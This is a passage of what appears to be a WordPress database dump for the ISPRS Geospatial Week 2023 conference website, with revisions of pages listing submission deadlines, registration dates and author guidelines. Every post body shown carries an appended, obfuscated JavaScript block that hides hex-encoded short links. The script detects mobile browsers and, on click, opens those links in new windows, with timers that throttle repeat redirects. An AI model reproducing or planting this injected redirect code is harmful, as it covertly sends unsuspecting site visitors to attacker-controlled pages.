ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SUBMIT','','inherit','closed','closed','','2659-revision-v1','','','2023-02-05 09:07:15','2023-02-05 09:07:15','',2659,'https://gsw2023.com/?p=3789',0,'revision','',0),
(3790,1,'2023-02-05 09:30:23','2023-02-05 09:30:23','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: gray;\"><span style=\"font-size: 18pt;\"><strong>ISPRS Geospatial Week: 2-7 September 2023</strong></span></h5>\n<div class=\"three_quarter first\">\n<div class=\"gap-10\">\n<h5></h5>\n</div>\n</div>\n<div class=\"three_quarter first\">\n<p><span style=\"font-size: 14pt;\"><strong>Important Dates:</strong></span></p>\n<ol>\n<li><span style=\"font-size: 12pt;\"><strong> Annals (Fully Reviewed Papers):</strong></span></li>\n</ol>\n<ul>\n<li>Full paper submission (Annals): March 31, 2023 (hard deadline, no extension)</li>\n<li>Full paper Author notification: May 1, 2023</li>\n<li>Camera ready paper submission: June 1, 2023</li>\n</ul>\n<p>&nbsp;</p>\n<ol start=\"2\">\n<li><span style=\"font-size: 12pt;\"><strong> Archives (Abstract Reviewed Papers):</strong></span></li>\n</ol>\n<ul>\n<li>Abstracts submission (Archives): April 15, 2023 (hard deadline, no extension)</li>\n<li>Abstracts Author notification: May 15, 2023</li>\n<li>Camera ready paper submission: June 1, 2023</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Registration deadlines</strong></span></p>\n<ul>\n<li>Early bird registration deadline: May 1, 2023</li>\n<li>Late registration deadline: July 1, 2023</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','IMPORTANT DATES','','inherit','closed','closed','','2654-revision-v1','','','2023-02-05 09:30:23','2023-02-05 09:30:23','',2654,'https://gsw2023.com/?p=3790',0,'revision','',0),
(3791,1,'2023-02-05 09:33:55','2023-02-05 09:33:55','<p>[vc_row][vc_column][vc_column_text]<span style=\"font-size: 14pt;\"><strong>Submit Abstracts/Papers</strong></span></p>\n<p>&nbsp;</p>\n<p>The ISPRS Geospatial Week 2023 (GSW’2023) has been opened for paper submission. After creation of an account on the <a href=\"https://www.conftool.com/gsw2023\"> ConfToool website of the Geospatial Week</a>, authors can submit either a full paper or an extended abstract to one of the 26 Workshops available in GSW’2023</p>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][dt_portfolio_slider number=\"27\" order=\"asc\" padding=\"30\" appearance=\"from_bottom\" content_aligment=\"center\" show_title=\"true\" show_link=\"true\" show_details=\"true\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][vc_separator style=\"shadow\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]The papers must be prepared according to the <a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\">ISPRS guidelines</a>. Paper reviews will be conducted according to the <a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\">ISPRS reviewing process</a>. <strong>Note that Full papers should be submitted anonymously</strong><strong>. Please also check that your name is not listed in the document properties of the submitted .pdf and not included in the file name!</strong></p>\n<p>&nbsp;</p>\n<p>Full papers accepted after the review process organised by the workshop convenors will be published in the <a href=\"http://www.isprs.org/publications/annals.aspx\">ISPRS Annals</a>. Authors of accepted extended abstracts (around 1000 words) will be invited to submit their full paper in a later stage for publication in the <a href=\"http://www.isprs.org/publications/archives.aspx\">ISPRS Archives</a>.</p>\n<div class=\"three_quarter first\">\n<div id=\"respond\"></div>\n</div>\n<p>[/bsf-info-box][vc_column_text]</p>\n<div class=\"three_quarter first\">\n<div class=\"gap-10\">\n<h5></h5>\n</div>\n</div>\n<div class=\"three_quarter first\">\n<p><span style=\"font-size: 14pt;\"><strong>Important Dates:</strong></span></p>\n<ol>\n<li><span style=\"font-size: 12pt;\"><strong> Annals (Fully Reviewed Papers):</strong></span></li>\n</ol>\n<ul>\n<li>Full paper submission (Annals): March 31, 2023 (hard deadline, no extension)</li>\n<li>Full paper Author notification: May 1, 2023</li>\n<li>Camera ready paper submission: June 1, 2023</li>\n</ul>\n<p>&nbsp;</p>\n<ol start=\"2\">\n<li><span style=\"font-size: 12pt;\"><strong> Archives (Abstract Reviewed Papers):</strong></span></li>\n</ol>\n<ul>\n<li>Abstracts submission (Archives): April 15, 2023 (hard deadline, no extension)</li>\n<li>Abstracts Author notification: May 15, 2023</li>\n<li>Camera ready paper submission: June 1, 2023</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Registration deadlines</strong></span></p>\n<ul>\n<li>Early bird registration deadline: May 1, 2023</li>\n<li>Late registration deadline: July 1, 2023</li>\n</ul>\n<p>&nbsp;</p>\n<p><strong><span style=\"font-size: 14pt;\">Useful links:</span></strong></p>\n<p><a href=\"https://www.conftool.com/gsw2023\">ConfToool website of the Geospatial Week2023</a></p>\n<p><a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\">Guidelines for Authors</a></p>\n<p><a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\">Reviewing process for ISPRS Events</a></p>\n<p>&nbsp;</p>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( 